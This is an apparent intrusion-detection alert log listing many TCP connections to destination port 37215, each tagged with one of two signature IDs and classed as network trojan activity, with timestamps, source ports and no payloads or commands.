                Timestamp:06/14/24-10:44:22.878177
                SID:2829579
                Source Port:33496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472646
                SID:2835222
                Source Port:60244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702475
                SID:2829579
                Source Port:44120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.946968
                SID:2835222
                Source Port:38172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861993
                SID:2829579
                Source Port:50540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.674905
                SID:2835222
                Source Port:46504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325273
                SID:2835222
                Source Port:54678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548750
                SID:2835222
                Source Port:35540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669847
                SID:2829579
                Source Port:40758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966501
                SID:2835222
                Source Port:39434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472670
                SID:2835222
                Source Port:50574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025011
                SID:2829579
                Source Port:58518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152600
                SID:2829579
                Source Port:53392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011180
                SID:2829579
                Source Port:57178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804945
                SID:2829579
                Source Port:45254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829898
                SID:2829579
                Source Port:58758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547614
                SID:2829579
                Source Port:49754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.679561
                SID:2829579
                Source Port:46000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.181849
                SID:2835222
                Source Port:38214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.344508
                SID:2835222
                Source Port:36012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184762
                SID:2829579
                Source Port:38400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684567
                SID:2829579
                Source Port:39264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290118
                SID:2829579
                Source Port:39286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420663
                SID:2829579
                Source Port:56542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733160
                SID:2835222
                Source Port:46786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827381
                SID:2835222
                Source Port:34948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989744
                SID:2829579
                Source Port:37408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.778107
                SID:2835222
                Source Port:50638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.050972
                SID:2829579
                Source Port:51476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.272935
                SID:2835222
                Source Port:47476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226670
                SID:2829579
                Source Port:36966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997432
                SID:2835222
                Source Port:55642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718241
                SID:2829579
                Source Port:51104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968032
                SID:2835222
                Source Port:37208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277492
                SID:2829579
                Source Port:33998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276208
                SID:2835222
                Source Port:59464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244334
                SID:2835222
                Source Port:53562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368491
                SID:2829579
                Source Port:42606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382553
                SID:2835222
                Source Port:46664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411190
                SID:2829579
                Source Port:57636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616281
                SID:2835222
                Source Port:55638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969069
                SID:2835222
                Source Port:32846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502405
                SID:2835222
                Source Port:41792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762717
                SID:2835222
                Source Port:60254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182731
                SID:2829579
                Source Port:42146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942329
                SID:2829579
                Source Port:59900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727874
                SID:2829579
                Source Port:58146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805651
                SID:2835222
                Source Port:46944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422307
                SID:2835222
                Source Port:53778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850109
                SID:2829579
                Source Port:36842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763365
                SID:2835222
                Source Port:45628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014117
                SID:2835222
                Source Port:49594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968868
                SID:2835222
                Source Port:59034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967213
                SID:2835222
                Source Port:57630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295392
                SID:2829579
                Source Port:41242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789705
                SID:2835222
                Source Port:34522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849639
                SID:2829579
                Source Port:38596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944527
                SID:2835222
                Source Port:51462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200578
                SID:2829579
                Source Port:45248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181040
                SID:2835222
                Source Port:50978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.183064
                SID:2829579
                Source Port:33322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471178
                SID:2835222
                Source Port:55532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277428
                SID:2835222
                Source Port:51500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.083715
                SID:2835222
                Source Port:57848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339790
                SID:2829579
                Source Port:50172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.050884
                SID:2835222
                Source Port:54310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185164
                SID:2829579
                Source Port:55238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776531
                SID:2835222
                Source Port:60298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198516
                SID:2835222
                Source Port:41478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717746
                SID:2829579
                Source Port:55872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.088890
                SID:2829579
                Source Port:40734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829204
                SID:2835222
                Source Port:57716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242238
                SID:2829579
                Source Port:40320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111335
                SID:2829579
                Source Port:39898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163549
                SID:2835222
                Source Port:39506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384278
                SID:2835222
                Source Port:48728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012702
                SID:2835222
                Source Port:46874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159804
                SID:2829579
                Source Port:43732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.896548
                SID:2835222
                Source Port:41430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000295
                SID:2829579
                Source Port:44302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811821
                SID:2835222
                Source Port:46080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411018
                SID:2829579
                Source Port:37922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186684
                SID:2829579
                Source Port:53156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110804
                SID:2829579
                Source Port:49132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640622
                SID:2835222
                Source Port:43810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.900048
                SID:2829579
                Source Port:47910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051362
                SID:2835222
                Source Port:47012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228778
                SID:2835222
                Source Port:45802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732616
                SID:2835222
                Source Port:33966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409223
                SID:2829579
                Source Port:47090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150619
                SID:2829579
                Source Port:44772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917652
                SID:2829579
                Source Port:42680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151221
                SID:2829579
                Source Port:36018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.056259
                SID:2835222
                Source Port:48138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688742
                SID:2835222
                Source Port:40994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805240
                SID:2829579
                Source Port:47106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074816
                SID:2829579
                Source Port:58334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133912
                SID:2835222
                Source Port:35490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624946
                SID:2835222
                Source Port:49790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670210
                SID:2829579
                Source Port:37556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978376
                SID:2829579
                Source Port:42054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848414
                SID:2829579
                Source Port:42582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678282
                SID:2835222
                Source Port:55996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.342668
                SID:2829579
                Source Port:36008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565530
                SID:2829579
                Source Port:54892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978307
                SID:2835222
                Source Port:36158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703177
                SID:2829579
                Source Port:51882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677530
                SID:2835222
                Source Port:43528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972013
                SID:2835222
                Source Port:41764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998270
                SID:2829579
                Source Port:55348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341620
                SID:2829579
                Source Port:43516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662099
                SID:2835222
                Source Port:32894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503988
                SID:2829579
                Source Port:43166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568897
                SID:2829579
                Source Port:55788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682060
                SID:2829579
                Source Port:49086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860060
                SID:2829579
                Source Port:51216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034276
                SID:2835222
                Source Port:35540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.774954
                SID:2829579
                Source Port:33220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115780
                SID:2829579
                Source Port:54004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071038
                SID:2835222
                Source Port:54356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.364802
                SID:2835222
                Source Port:47280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681592
                SID:2829579
                Source Port:42272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791388
                SID:2835222
                Source Port:39210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383328
                SID:2829579
                Source Port:54294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072832
                SID:2835222
                Source Port:47566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291197
                SID:2829579
                Source Port:55898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.988908
                SID:2829579
                Source Port:36858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503132
                SID:2835222
                Source Port:55742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934845
                SID:2829579
                Source Port:56198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989679
                SID:2829579
                Source Port:47708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917180
                SID:2829579
                Source Port:58392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941995
                SID:2835222
                Source Port:44216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847506
                SID:2835222
                Source Port:49170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423808
                SID:2835222
                Source Port:59434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849078
                SID:2835222
                Source Port:57778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761743
                SID:2829579
                Source Port:49442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274724
                SID:2835222
                Source Port:35110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149272
                SID:2829579
                Source Port:54756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020729
                SID:2829579
                Source Port:39788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979274
                SID:2829579
                Source Port:51144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115650
                SID:2829579
                Source Port:38306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133176
                SID:2829579
                Source Port:39364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850672
                SID:2829579
                Source Port:57868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977754
                SID:2829579
                Source Port:36528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616866
                SID:2829579
                Source Port:48260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182446
                SID:2835222
                Source Port:58248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472203
                SID:2835222
                Source Port:42500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000655
                SID:2835222
                Source Port:43936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367211
                SID:2829579
                Source Port:34090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715906
                SID:2829579
                Source Port:50432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671920
                SID:2829579
                Source Port:45202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726815
                SID:2835222
                Source Port:54008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861159
                SID:2835222
                Source Port:58894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131136
                SID:2829579
                Source Port:35358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848799
                SID:2829579
                Source Port:51016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424353
                SID:2835222
                Source Port:37628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470511
                SID:2835222
                Source Port:44524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338082
                SID:2829579
                Source Port:37924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245864
                SID:2829579
                Source Port:48524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737899
                SID:2829579
                Source Port:48508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151443
                SID:2835222
                Source Port:51142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682177
                SID:2835222
                Source Port:46406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625526
                SID:2829579
                Source Port:35272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828891
                SID:2835222
                Source Port:42108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.386207
                SID:2835222
                Source Port:59184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143237
                SID:2835222
                Source Port:42398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.246095
                SID:2835222
                Source Port:38150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792277
                SID:2829579
                Source Port:35368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369151
                SID:2835222
                Source Port:50650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027708
                SID:2835222
                Source Port:33040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226826
                SID:2829579
                Source Port:33136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504084
                SID:2829579
                Source Port:36086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084609
                SID:2835222
                Source Port:37766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861130
                SID:2829579
                Source Port:33142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792758
                SID:2835222
                Source Port:44078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027152
                SID:2835222
                Source Port:56512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968836
                SID:2829579
                Source Port:36954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504676
                SID:2835222
                Source Port:39744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383617
                SID:2829579
                Source Port:34690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073121
                SID:2835222
                Source Port:49934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.788962
                SID:2829579
                Source Port:60500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177664
                SID:2829579
                Source Port:37368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779220
                SID:2829579
                Source Port:57424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765097
                SID:2835222
                Source Port:36794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159682
                SID:2829579
                Source Port:46392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724976
                SID:2829579
                Source Port:37102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967858
                SID:2829579
                Source Port:33010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715160
                SID:2835222
                Source Port:55396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321246
                SID:2835222
                Source Port:59036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789741
                SID:2835222
                Source Port:57194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230841
                SID:2829579
                Source Port:53006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859816
                SID:2829579
                Source Port:51358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549338
                SID:2835222
                Source Port:51044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761900
                SID:2835222
                Source Port:33184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244119
                SID:2835222
                Source Port:46952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.015018
                SID:2835222
                Source Port:38694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186506
                SID:2835222
                Source Port:46520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881342
